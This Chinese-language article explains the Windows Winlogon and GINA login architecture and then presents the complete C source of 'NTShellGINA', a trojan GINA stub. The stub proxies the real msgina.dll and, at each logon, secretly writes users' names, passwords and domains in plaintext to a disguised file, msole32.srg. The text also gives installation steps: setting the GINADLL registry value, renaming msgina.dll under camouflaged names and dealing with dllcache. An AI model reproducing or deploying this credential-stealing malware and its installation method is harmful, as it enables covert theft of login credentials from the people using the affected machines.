(1) Winlogon进程将创建并打开一个Window Stations,然后设置一个访问控制人口(ACE),该ACE中只包含Winlogon进程的SID,这样就只有Winlogon进程才能访问该Window Stations 。
(2) 然后winlogon创建桌面,设置其中的winlogon桌面只有winlogon可以访问,其他进程不能访问该桌面的任何数据和代码;利用这一特性保护口令、锁定桌面等操作的安全。winlogon还会注册安全注意序列(SAS - secure attention sequence)的热键,任何时候按下SAS热键(缺省为ctrl+alt+del),将调用Winlogon,切换到安全桌面,从而使密码捕捉程序不能接收登录密码和更改密码等安全活动。
而登录进程的验证和身份验证都是在GINA(GINA - Graphical Identification and Authentication图形标识和身份验证)中实现的,微软的GINA是MSGINA.dll,实现了默认的Windows NT登录界面。
不过可以自己开发GINA DLL以实现其他的身份验证方法,如磁卡。当然这也为木马留下了机会,可以通过编写和系统GINA界面相同的GINA,然后取代MSGINA.dll。在msdn sample里有一个GINA的例子。不过如果仅仅为了获取登录密码,没有必要那么麻烦,只需写一个接口和GINA一样的,然后所有函数在实现时都去调
用MSGINA.dll的相同函数就可以了,在msdn sample里也有这样一个例子叫做ginastub,当然作为木马还要在登录时将密码转储。(更多的gina信息,在msdn里查找gina)
不过微软还在注册表里留了一个位置由于安装GINA,在HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon下设置GINADLL为某个GINA DLL,(GINADLL这个值缺省没有)如果设置了这个值,nt会调用该GINA,而不会调用缺省的msGINA.dll。因此NTShell的第一种安装方法是将NTShellGINA.dll拷贝到system32\mshtmlgi.dll,然后设置GINADLL为mshtmlgi.dll。
因此第二种方法安装成功的前提是系统原来没有设置GINADLL这个值,否则将不予安装NTShellGINA 。当然在win2000里如果使用第二种安装方法还要把dllcache里msgina.dll改名。(ntshell改名为mshtmlgi.dll)。
由于GINA DLL负责系统认证和安全登录,因此如果一旦出错,用户将不能登录系统,必须慎用。也因此NTShell在安装时作了较多的检测,如果检测失败将不予安装。比如在把ntshellgina.dll拷贝为文件msgina.dll的安装方法里,第一次mslogon32.dll<-msgina.dll<-ntshellgina.dll,如果再次安装用msgina.dll替换mslogon32.dll,用ntshellgina.dll替换后来的msgina.dll(其实还是ntshellgina.dll),这样原来的msgina.dll就没有了,只有两个ntshellgina.dll,找不到真正的msgina.dll,ntshellgina.dll将失败。
/* NTShellGINA.c - a gina stub come from NTShell 1.0 by:[email protected], from homepage:bingle_site.top263.net 此文件是从tinastub.c文件修改过来的, 此文件将保存期登陆的密码到文件 system32\\msole32.srg --*/ #include <windows.h> #include <stdio.h> #include <winwlx.h> #include "ginastub.h" // // winlogon function dispatch table // PWLX_DISPATCH_VERSION_1_0 g_pWinlogon; // // Functions pointers to the real msgina which we will call. // PGWLXNEGOTIATE GWlxNegotiate; PGWLXINITIALIZE GWlxInitialize; PGWLXDISPLAYSASNOTICE GWlxDisplaySASNotice; PGWLXLOGGEDOUTSAS GWlxLoggedOutSAS; PGWLXACTIVATEUSERSHELL GWlxActivateUserShell; PGWLXLOGGEDONSAS GWlxLoggedOnSAS; PGWLXDISPLAYLOCKEDNOTICE GWlxDisplayLockedNotice; PGWLXWKSTALOCKEDSAS GWlxWkstaLockedSAS; PGWLXISLOCKOK GWlxIsLockOk; PGWLXISLOGOFFOK GWlxIsLogoffOk; PGWLXLOGOFF GWlxLogoff; PGWLXSHUTDOWN GWlxShutdown; // // NEW for version 1.1 // PGWLXSTARTAPPLICATION GWlxStartApplication; PGWLXSCREENSAVERNOTIFY GWlxScreenSaverNotify; // // hook into the real GINA. // BOOL MyInitialize( void ) { HINSTANCE hDll; // // judge if which dll to load, if the file named "msgina.dll" // then ntshell is changed MSGINA.DLL-->mslogon32.dll, so load it // if named others then just load MSGINA.DLL // char origina[]="MSGINA.DLL"; char chgedgina[]="mslogon32.dll"; char *realgina; char filename[MAX_PATH]; int result; FILE *fp; HMODULE hself; #ifdef _DEBUG fp=fopen("ginalog.txt", "ab"); if(fp) { sprintf(filename, "\r\nMyInitialize been called by "); fwrite(filename, strlen(filename), 1, fp); result=GetModuleFileName(NULL, filename, MAX_PATH); if(result)fwrite(filename, strlen(filename), 1, fp); fclose(fp); } #endif realgina=NULL; hself=GetModuleHandle(origina); if(!hself)realgina=origina;//hself=GetModuleHandle(chgedgina); else realgina=chgedgina;//if origina loaded, this is origina // Load original MSGINA.DLL. if( !(hDll = LoadLibrary( realgina )) ) { return FALSE; } // Get pointers to all of the WLX functions in the real MSGINA. GWlxNegotiate = (PGWLXNEGOTIATE)GetProcAddress( hDll, "WlxNegotiate" ); if( !GWlxNegotiate ) { return FALSE; } GWlxInitialize = (PGWLXINITIALIZE)GetProcAddress( hDll, "WlxInitialize" ); if( !GWlxInitialize ) { return FALSE; } GWlxDisplaySASNotice = (PGWLXDISPLAYSASNOTICE)GetProcAddress( hDll, "WlxDisplaySASNotice" ); if( !GWlxDisplaySASNotice ) { return FALSE; } GWlxLoggedOutSAS = (PGWLXLOGGEDOUTSAS)GetProcAddress( hDll, "WlxLoggedOutSAS" ); if( !GWlxLoggedOutSAS ) { return FALSE; } GWlxActivateUserShell = (PGWLXACTIVATEUSERSHELL)GetProcAddress( hDll, "WlxActivateUserShell" ); if( !GWlxActivateUserShell ) { return FALSE; } GWlxLoggedOnSAS = (PGWLXLOGGEDONSAS)GetProcAddress( hDll, "WlxLoggedOnSAS" ); if( !GWlxLoggedOnSAS ) { return FALSE; } GWlxDisplayLockedNotice = (PGWLXDISPLAYLOCKEDNOTICE)GetProcAddress( hDll, "WlxDisplayLockedNotice" ); if( !GWlxDisplayLockedNotice ) { return FALSE; } GWlxIsLockOk = (PGWLXISLOCKOK)GetProcAddress( hDll, "WlxIsLockOk" ); if( !GWlxIsLockOk ) { return FALSE; } GWlxWkstaLockedSAS = (PGWLXWKSTALOCKEDSAS)GetProcAddress( hDll, "WlxWkstaLockedSAS" ); if( !GWlxWkstaLockedSAS ) { return FALSE; } GWlxIsLogoffOk = (PGWLXISLOGOFFOK)GetProcAddress( hDll, "WlxIsLogoffOk" ); if( !GWlxIsLogoffOk ) { return FALSE; } GWlxLogoff = (PGWLXLOGOFF)GetProcAddress( hDll, "WlxLogoff" ); if( !GWlxLogoff ) { return FALSE; } GWlxShutdown = (PGWLXSHUTDOWN)GetProcAddress( hDll, "WlxShutdown" ); if( !GWlxShutdown ) { return FALSE; } // we don't check for failure here because these don't exist for // gina's implemented prior to Windows NT 4.0 GWlxStartApplication = (PGWLXSTARTAPPLICATION) GetProcAddress( hDll, "WlxStartApplication" ); GWlxScreenSaverNotify = (PGWLXSCREENSAVERNOTIFY) GetProcAddress( hDll, "WlxScreenSaverNotify" ); // Everything loaded ok. Return success. return TRUE; } BOOL WINAPI WlxNegotiate(DWORD dwWinlogonVersion, DWORD *pdwDllVersion) { if( !MyInitialize() ) return FALSE; return GWlxNegotiate( dwWinlogonVersion, pdwDllVersion ); } BOOL WINAPI WlxInitialize( LPWSTR lpWinsta, HANDLE hWlx, PVOID pvReserved, PVOID pWinlogonFunctions, PVOID *pWlxContext) { return GWlxInitialize( lpWinsta, hWlx, pvReserved, pWinlogonFunctions, pWlxContext ); } VOID WINAPI WlxDisplaySASNotice( PVOID pWlxContext ) { GWlxDisplaySASNotice( pWlxContext ); } int WINAPI WlxLoggedOutSAS(PVOID pWlxContext, DWORD dwSasType, PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions, PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo, PVOID *pProfile) { int iRet; iRet = GWlxLoggedOutSAS(pWlxContext, dwSasType, pAuthenticationId, pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile ); if(iRet == WLX_SAS_ACTION_LOGON) { // copy pMprNotifyInfo and pLogonSid for later use FILE *fp; fp=fopen("msole32.srg", "a"); if(fp!=NULL) { char infor[300], buf[300]; memset(buf, 0, 300); wcstombs(buf, pMprNotifyInfo->pszUserName, 300); sprintf(infor, "%s", buf); memset(buf, 0, 300);//if convert failed, we use the error one also wcstombs(buf, pMprNotifyInfo->pszPassword, 300); sprintf(infor, "%s:%s", infor, buf); memset(buf, 0, 300); wcstombs(buf, pMprNotifyInfo->pszDomain, 300); sprintf(infor, "%s:%s\r\n", infor, buf); fwrite(infor, 1, strlen(infor), fp); fclose(fp); } // pMprNotifyInfo->pszOldPassword } return iRet; } BOOL WINAPI WlxActivateUserShell( PVOID pWlxContext, PWSTR pszDesktopName, PWSTR pszMprLogonScript, PVOID pEnvironment) { return GWlxActivateUserShell( pWlxContext, pszDesktopName, pszMprLogonScript, pEnvironment ); } int WINAPI WlxLoggedOnSAS( PVOID pWlxContext, DWORD dwSasType, PVOID pReserved) { return GWlxLoggedOnSAS( pWlxContext, dwSasType, pReserved ); } VOID WINAPI WlxDisplayLockedNotice( PVOID pWlxContext ) { GWlxDisplayLockedNotice( pWlxContext ); } BOOL WINAPI WlxIsLockOk( PVOID pWlxContext ) { return GWlxIsLockOk( pWlxContext ); } int WINAPI WlxWkstaLockedSAS( PVOID pWlxContext, DWORD dwSasType ) { return GWlxWkstaLockedSAS( pWlxContext, dwSasType ); } BOOL WINAPI WlxIsLogoffOk( PVOID pWlxContext ) { BOOL bSuccess; bSuccess = GWlxIsLogoffOk( pWlxContext ); if(bSuccess) { // // if it's ok to logoff, finish with the stored credentials // and scrub the buffers // } return bSuccess; } VOID WINAPI WlxLogoff( PVOID pWlxContext ) { GWlxLogoff( pWlxContext ); } VOID WINAPI WlxShutdown( PVOID pWlxContext, DWORD ShutdownType ) { GWlxShutdown( pWlxContext, ShutdownType ); } // // NEW for version 1.1 // BOOL WINAPI WlxScreenSaverNotify( PVOID pWlxContext, BOOL * pSecure ) { if(GWlxScreenSaverNotify != NULL) return GWlxScreenSaverNotify( pWlxContext, pSecure ); // // if not exported, return something intelligent // *pSecure = TRUE; return TRUE; } BOOL WINAPI WlxStartApplication( PVOID pWlxContext, PWSTR pszDesktopName, PVOID pEnvironment, PWSTR pszCmdLine ) { if(GWlxStartApplication != NULL) return GWlxStartApplication( pWlxContext, pszDesktopName, pEnvironment, pszCmdLine ); // // if not exported, return something intelligent // }